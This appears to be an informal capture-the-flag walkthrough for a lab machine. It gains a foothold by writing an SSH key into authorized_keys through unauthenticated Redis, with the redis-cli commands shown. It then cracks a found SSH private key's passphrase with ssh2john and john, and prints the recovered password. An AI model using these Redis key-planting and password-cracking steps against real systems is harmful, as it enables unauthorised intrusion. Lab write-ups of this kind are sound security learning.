Nothing intresting over here , just a static web page with no functionality
https://10.10.10.160:10000
Their is login page powered by "WEBMIN" , by default webmin doesn't have any default credentials
i also tried sql & no sql injection ...... no benifit , we will look back here after a while
/upload
just bunch of images , almost no one is opening or have something intresting ....i moved on
redis 6379
we can connect with redis just using net-cat , and we can execute commands
shell as redis
i created a ssh pub-pri key pair and then i used the redis server to import and save the key i authorized keys , after that just do the ssh in system as redis user and , we got the shell
Importing ssh key :-
Saving ssh key in authorized keys :-
privesc redis => Matt
linpeas.sh
I found a SSH RSA private key for Matt user , so i first used it for direct ssh login......didn't work
next thing , i extracted the key contents (hash) by using ssh2john , we can also extract that online
after extracting the hash from key , we need to crack it , for this i used john
i used the key and password and ........i still got fail ,
so i tried "su - Matt" in the shell i already have and i succeeded ......got the shell as Matt
privesc Matt => root
These credentials also work for webpage we found earlier ,
we kind of need metasploit payload to do that , so i just skip it
cat new_key.txt | redis-cli -h 10.85.0.52 -x set new_key.txt
redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
python ssh2john.py matt_ssh.key > hash.txt
john --wordlist=~/chaos/rockyou.txt hash.txt
>>
computer2008